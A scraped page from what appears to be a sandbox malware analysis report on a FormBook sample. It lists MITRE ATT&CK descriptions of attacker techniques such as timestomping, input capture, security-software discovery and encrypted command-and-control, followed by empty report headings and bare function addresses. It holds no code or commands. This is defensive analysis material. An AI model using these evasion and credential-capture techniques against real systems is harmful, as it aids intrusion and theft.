Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report YvGnm93rap.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 004181BB, Relevance: 1.5, APIs: 1, Instructions: 43
filenativeCOMMON

Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 0041839A, Relevance: 1.5, APIs: 1, Instructions: 31
memorynativeCOMMON

Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON